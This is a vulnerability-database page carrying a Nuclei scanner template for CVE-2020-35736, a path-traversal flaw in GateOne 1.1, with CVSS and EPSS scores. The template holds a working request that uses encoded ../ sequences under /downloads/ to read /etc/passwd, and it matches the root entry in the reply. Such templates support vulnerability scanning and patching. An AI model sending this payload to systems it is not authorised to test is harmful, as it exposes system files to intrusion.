Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-35736
HistoryMay 27, 2021 - 12:56 p.m.

GateOne 1.1 - Local File Inclusion

2021-05-2712:56:22
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.017 Low

EPSS

Percentile

87.9%

GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/… local file inclusion because os.path.join is incorrectly used.

id: CVE-2020-35736

info:
  name: GateOne 1.1 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1.
  reference:
    - https://github.com/liftoff/GateOne/issues/747
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35736
    - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/
    - https://github.com/20142995/Goby
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-35736
    cwe-id: CWE-22
    epss-score: 0.01204
    epss-percentile: 0.85176
    cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: liftoffsoftware
    product: gateone
  tags: cve,cve2020,gateone,lfi,liftoffsoftware

http:
  - method: GET
    path:
      - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bbb2a8bf728c4c43291d2c61c2bd9d5199cb6948e78cee0b50ef9fe2fbf53d910221008bb0ab7b0858acf338ecefe99cd21ef1c5a6f604abbc02b1909964416040dea4:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.017 Low

EPSS

Percentile

87.9%